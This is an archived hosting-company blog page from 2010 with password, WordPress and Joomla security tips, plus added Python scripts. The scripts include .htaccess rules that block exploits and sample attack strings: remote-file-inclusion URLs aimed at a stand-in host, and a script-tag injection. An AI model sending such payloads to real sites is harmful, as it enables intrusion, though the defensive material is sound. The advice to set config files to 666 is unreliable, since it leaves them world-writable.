Archive

Archive for June, 2010

New .COM & .NET Prices from 30th June

June 30th, 2010

To accommodate the Registry price hike that was announced last year, we will be increasing our prices for .COM and .NET Domains from the 30th of June, 2010 at 14:30.

The new prices for .COM and .NET will be £7.00.

Important:

  • These prices will be applicable from the 30th of June, 2010 at 14:30;
  • The prices mentioned will be applicable on .COM and .NET Domains only. The prices for .BIZ, .INFO, .ORG and .NAME Domains will not be modified;
  • These prices are applicable to all years of Registration, Renewal and Transfer-in.

Creating Secure Passwords: Tips For Creating Strong Passwords You Can Remember

June 29th, 2010

One of the problems we see with passwords is that users forget them. To avoid forgetting them, they use simple things like their dog’s name, their son’s first name and birthdate, or the name of the current month: anything that gives them a clue to what their password is. This is very dangerous.

For a curious hacker who has somehow gained access to your computer system, this is the equivalent of locking your door and leaving the key under the doormat. Without resorting to any specialised tools, a hacker can discover your basic personal information (name, children’s names, birthdate, pet names, etc.) and try all of those out as potential passwords.

To create a secure password that is easy for you to remember, follow these simple steps:

  1. Do not use personal information. You should never use personal information as a part of your password. It is very easy for someone to guess things like your last name, pet’s name, child’s birth date and other similar details.
  2. Do not use real words. There are tools available to help attackers guess your password. With today’s computing power, it doesn’t take long to try every word in the dictionary and find your password, so it is best if you do not use real words for your password.
  3. Mix different character types. You can make a password much more secure by mixing different types of characters. Use some uppercase letters along with lowercase letters, numbers and even special characters such as ‘&’ or ‘%’.
  4. Use a passphrase. Rather than trying to remember a password built from various character types that is also not a dictionary word, you can use a passphrase. Think up a sentence or a line from a song or poem that you like and create a password using the first letter of each word. For example, rather than just having a password like ‘yr$1Hes’, you could take a sentence such as “I like to read about security” and convert it to a password like ‘!l2rAs’. By substituting the number ‘2’ for the word ‘to’ and using an exclamation point in place of the ‘I’, you can use a variety of character types and create a secure password that is hard to crack, but much easier for you to remember.
  5. Use a password management tool. Another way to store and remember passwords securely is to use some sort of password management tool. These tools maintain a list of usernames and passwords in encrypted form. Some will even automatically fill in the username and password information on sites and applications.

Using the tips above will help you create passwords that are more secure, but you should also follow these tips:

  • Use different passwords. You should use a different username and password for each login or application you are trying to protect. That way, if one gets compromised the others are still safe. Another approach, which is less secure but provides a fair trade-off between security and convenience, is to use one username and password for sites and applications that don’t need the extra security, but unique usernames and more secure passwords on sites such as your bank or credit card companies.
  • Change your passwords. You should change your password at least every 30 to 60 days. You should also not re-use a password for at least a year.
  • Enforce stronger passwords. Rather than relying on every user of the computer to understand and follow the instructions above, you can configure Microsoft Windows password policies so that Windows will not accept passwords that don’t meet the minimum requirements.
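
As an added example (not part of the original post), here is a small Python script that applies the rules above: it derives a password from a passphrase the way step 4 describes, and checks a candidate against the personal-information, dictionary-word and character-mix rules. The word lists and the extra "and" to "&" substitution are constructed assumptions, and the capital ‘A’ in the post’s ‘!l2rAs’ is a manual choice the function does not reproduce.

```python
import re

# Constructed sample data: a real check would load a full wordlist (e.g. /usr/share/dict/words)
# and the user's own details instead of these short inline sets.
DICTIONARY = {"password", "security", "summer", "dragon", "letmein", "welcome"}
PERSONAL_INFO = {"rex", "1987", "smith", "june"}  # pet name, birth year, surname, current month

# Whole words swapped for a symbol or digit, as in the post's "to" -> "2" and "I" -> "!";
# the "and" -> "&" entry is an added assumption in the same spirit.
SUBSTITUTIONS = {"i": "!", "to": "2", "and": "&"}


def passphrase_to_password(sentence):
    """Keep the first character of each word, except for words that SUBSTITUTIONS
    replaces wholesale. Capitalising a letter, as the post does with 'A', is left to the user."""
    out = []
    for word in sentence.split():
        key = word.strip(".,!?;:'\"").lower()
        out.append(SUBSTITUTIONS.get(key, word[0]))
    return "".join(out)


CHARACTER_CLASSES = (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^a-zA-Z0-9]")


def weaknesses(password, dictionary=DICTIONARY, personal=PERSONAL_INFO):
    """Return the post's rules that the password breaks (an empty list means it passes)."""
    problems = []
    lowered = password.lower()
    if any(item in lowered for item in personal):
        problems.append("contains personal information")
    # Any run of four or more letters that is a dictionary word counts, so "Summer2010" fails.
    if any(run in dictionary for run in re.findall(r"[a-z]{4,}", lowered)):
        problems.append("contains a dictionary word")
    if sum(bool(re.search(cls, password)) for cls in CHARACTER_CLASSES) < 3:
        problems.append("uses fewer than three character types")
    return problems


if __name__ == "__main__":
    derived = passphrase_to_password("I like to read about security")
    print(derived, weaknesses(derived))
    for candidate in ("Rex1987", "Summer2010", "password"):
        print(candidate, weaknesses(candidate))
```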

Top 5 WordPress Security Tips

June 29th, 2010

Below is a list of the top 5 tips that most WordPress administrators do not do, but should:

1. Don’t use the admin account – The default user account created with every WordPress installation is called admin. Unfortunately the entire world knows this, including hackers, who can easily launch a dictionary attack on your website to try and guess your password. If a hacker already knows your username, that’s half the battle. It’s highly recommended to delete the admin account or change its username.

2. Move your wp-config.php file – Did you know since WordPress 2.6 you can move your wp-config.php file outside of your root WordPress directory? Most users don’t know this and the ones that do don’t do it. To do this simply move your wp-config.php file up one directory from your WordPress root. WordPress will automatically look for your config file there if it can’t find it in your root directory.

3. Change the WordPress table prefix – The WordPress table prefix is wp_ by default. You can change this before installing WordPress by changing the $table_prefix value in your wp-config.php file; we recommend a unique value such as rtyujikj_. If a hacker is able to exploit your website using SQL injection, this will make it harder for them to guess your table names and may well keep them from doing SQL injection at all.

4. Use Secret Keys – This is probably the most followed security tip on the list, but I’m still amazed at how many people don’t do this. A secret key is a hashing salt used with your password to make it even stronger. Secret keys are set in your wp-config.php file. Simply visit https://api.wordpress.org/secret-key/1.1 to have a set of randomly generated secret keys created for you. Copy the 4 secret keys to your wp-config.php file and save. You can add or change these keys at any time; the only effect is that all current WordPress cookies are invalidated and your users will have to log in again.

5. .htaccess lockdown – This is actually my favorite tip from my presentation. Using a .htaccess file you can lock down your wp-admin directory by IP address, so that only the IP addresses you specify can reach your admin dashboard URLs. This makes it impossible for anyone else to try and hack your WordPress backend. To do this, simply create a file called .htaccess in your wp-admin directory and add the following code to it, replacing xxx.xxx.xxx.xxx with your IP address:

AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName "Access Control"
AuthType Basic
order deny,allow
deny from all
#IP address to Whitelist
allow from xxx.xxx.xxx.xxx

You can add more “allow from” lines, so make sure to add every IP address you plan on accessing your site from (e.g. home, work, etc.). Remember that most ISPs use dynamic IPs, so your IP address may change when you reconnect to your ISP. If you get locked out, just update your .htaccess file or delete it altogether. This obviously is not a good tip if you allow open registration, as your users need access to wp-admin.

So, how many of these tips do you follow regularly?


Top 5 Joomla E-commerce Extensions

June 28th, 2010

Joomla is one of the most commonly used content management systems (CMS). One of the main reasons why this script is so widely used is its ability to create web sites and online applications with greatly varied functionality. Virtually any type of site with any purpose can be developed with Joomla. There are many extensions that can be added that make the possibilities with this software unlimited.

Whatever your site’s needs may be, it is likely that the time will come when you are ready to monetise your Joomla site. This may seem daunting to you, but not to worry. There are many helpful extensions that will help you accomplish your goals.

1. VirtueMart

This is a free shopping cart component for Joomla. It is fully featured, which makes it easy to sell your products online. It comes complete with user management, administration features, payment modules, tax modules, shipping address management, order confirmation emails, product availability, categories and many other features. This component’s functionality can even be extended with other Joomla components and extensions.

2. JcontentSubscription

This is another fantastic Joomla component, created for subscription-based web sites. If you are selling an informational product, this is the component for you. You can create subscriptions for individual users, any category or article, and for any section of any other component in use! That includes forums, web links, image galleries, bookmarks and files. It also comes with the ability to create different subscription types with different price structures. This component is also free!

3. eBay Flash Seller

This is an auction component that is compatible with Joomla 1.5. It can be used on unlimited domains because it is completely free. If you are an eBay seller you can easily display your auctions from your Joomla web site. This is a handy little component that will allow you to build different modules to show different auction listings on each page.

4. PayPal Sales Button

This is a very simple Joomla plug-in. It is compatible with Joomla 1.5. This nifty button allows you to sell one item or multiple items from any page. No complicated configuring is needed for this easy to use button. You can begin selling right away.

5. Donation Thermometer

This is a Joomla module that will assist with fund raising. It will display a red thermometer that will show a dollar amount increase with each donation given.

If you have chosen to use Joomla for your web site, I am sure you are beginning to fully understand what this software package is capable of. Aside from these E-commerce extensions, there are many different types of add-ons that will ensure that you can accomplish anything with your site.


7 tips to optimise Joomla! security

June 27th, 2010

Joomla! is a great CMS that is used worldwide. For this reason, hackers often try to find a way to hack a Joomla! website. Here are 7 tips to optimise Joomla! security and prevent your Joomla! website from being hacked.

Always remember to make a regular backup of your website and database. If you still get hacked, you can always go back to an older version of your website. Make sure you find out which extension caused the vulnerability and un-install it.

Above all, check the Joomla! website regularly, and UPDATE, UPDATE, UPDATE.

Change the default database prefix (jos_)

Most SQL injections written to attack a Joomla! website try to retrieve data from the jos_users table, so that they can obtain the username and password of the website’s super administrator. Changing the default prefix to something random will defeat most (if not all) of these pre-written SQL injections.

You can set the database prefix when installing your Joomla! website. If you’ve already installed Joomla! and want to change your prefix, do the following:

  1. Log on to your Joomla! back-end.
  2. Go to your global configuration and search for the database settings.
  3. Change your database prefix (example: fdasqw_) and press Save.
  4. Go to phpMyAdmin to access your database.
  5. Go to Export, leave all default values and press Start. Exporting the database can take a while.
  6. When done, select all of the exported SQL and copy it into Notepad (or any other text editor).
  7. In phpMyAdmin, select all tables and delete them.
  8. In Notepad, do a Search & Replace (Ctrl + H). Set the search term to jos_ and the replacement to your new prefix (example: fdasqw_). Press “Replace all”.
  9. Select everything in your Notepad file and copy it. In phpMyAdmin, go to SQL, paste the queries and press Start.

Remove the version number / name of extensions

Most vulnerabilities only occur in a specific release of a specific extension. Showing MyExtension version 2.14 is a really bad thing. You can modify this message to only the name of the extension by doing the following:

  1. Retrieve all files of the extension from your server.
  2. Open up Dreamweaver.
  3. Load any file from the extension that you just downloaded to your local machine.
  4. Use the Search function and set it to search through a specified folder. Navigate to the folder where you downloaded the extension.
  5. Set the search term to “MyExtension version 2.14” and press OK.
  6. When you have found the correct file, remove the version number.
  7. Upload the changed file to your server and check that the change is visible.

Use a SEF component

Most hackers use the Google inurl: search operator to find sites running a vulnerable extension. Use Artio, SH404SEF or another SEF component to rewrite your URLs so that your site does not show up in those searches.

Additionally, you’ll get a higher rank in Google when using search engine friendly URLs.

Keep Joomla! and extensions up to date

This one is pretty obvious. Always check for the latest versions of Joomla! and the extensions you’re using; most vulnerabilities are fixed in later versions.

Use the correct CHMOD for each folder and file

Setting files or folders to a CHMOD of 777 or 707 is only necessary when a script needs to write to that file or directory. All other files should have the following configuration:

  • PHP files: 644
  • Config files: 666
  • Other folders: 755

Delete leftover files

When you have installed an extension that you don’t like, don’t just set it to unpublished. If you do, the vulnerable files will still be on your website. Use the un-install function to get rid of the extension completely.

Change your .htaccess file

Add the following lines to your .htaccess file to block out some common exploits.

########## Begin - Rewrite rules to block out some common exploits
#
# mod_rewrite must be switched on once per .htaccess file; omit this line if it is already set above
RewriteEngine On
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)
RewriteCond %{QUERY_STRING} CONFIG_EXT(\[|%20|%5B).*= [NC,OR]
# Block out any script that tries to set sbp or sb_authorname via URL (simpleboard)
RewriteCond %{QUERY_STRING} sbp(=|%20|%3D) [OR]
RewriteCond %{QUERY_STRING} sb_authorname(=|%20|%3D)
# Send all blocked requests to the homepage with a 403 Forbidden error
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits
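
As an added example, not from the original post or from Joomla!, the following Python script replays the RewriteCond patterns above against constructed query strings, so you can see which requests they stop and which harmless request they also catch (a search containing the word base64_encode and a pair of parentheses) before deploying them. The rule labels and sample query strings are this example's own.

```python
import re

# The RewriteCond patterns from the .htaccess block above, translated one-for-one into
# Python regular expressions. Conditions carrying the [NC] flag get re.IGNORECASE; the
# rest are case-sensitive, exactly as Apache evaluates them.
RULES = [
    ("mosConfig_* override", r"mosConfig_[a-zA-Z_]{1,21}(=|%3D)", 0),
    ("base64_encode in URL", r"base64_encode.*\(.*\)", 0),
    ("<script> in URL", r"(<|%3C).*script.*(>|%3E)", re.IGNORECASE),
    ("GLOBALS override", r"GLOBALS(=|\[|%[0-9A-Z]{0,2})", 0),
    ("_REQUEST override", r"_REQUEST(=|\[|%[0-9A-Z]{0,2})", 0),
    ("CONFIG_EXT (com_extcal2)", r"CONFIG_EXT(\[|%20|%5B).*=", re.IGNORECASE),
    ("simpleboard sbp", r"sbp(=|%20|%3D)", 0),
    ("simpleboard sb_authorname", r"sb_authorname(=|%20|%3D)", 0),
]


def matching_rule(query_string):
    """Return the label of the first rule a raw query string trips, or None if Apache
    would let the request through. The conditions are chained with [OR], so one hit is enough."""
    for label, pattern, flags in RULES:
        if re.search(pattern, query_string, flags):
            return label
    return None


def triage(query_strings):
    """Map each query string to the rule it trips (None means the request is allowed)."""
    return {qs: matching_rule(qs) for qs in query_strings}


# Constructed sample query strings: an ordinary Joomla! request that must pass, three that
# the rules are meant to stop, and a harmless search that shows a false positive.
SAMPLES = [
    "option=com_content&view=article&id=12",
    "mosConfig_absolute_path=http://evil.example/x.txt",
    "GLOBALS[mosConfig_absolute_path]=http://evil.example/",
    "q=%3Cscript%3Ealert(1)%3C/script%3E",
    "searchword=base64_encode%20(php%20tutorial)",
]

if __name__ == "__main__":
    for qs, verdict in triage(SAMPLES).items():
        print(f"{verdict or 'allowed':28} {qs}")
```

The last sample is blocked only because the base64_encode pattern accepts anything between the function name and the parentheses, so expect to see a 403 on searches like it once these rules are live.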

For more Joomla! security tips, you can read the following:

Keep an eye on websites listing Joomla! vulnerabilities:

If you have more tips to enhance the security of Joomla!, we would really like to hear from you.
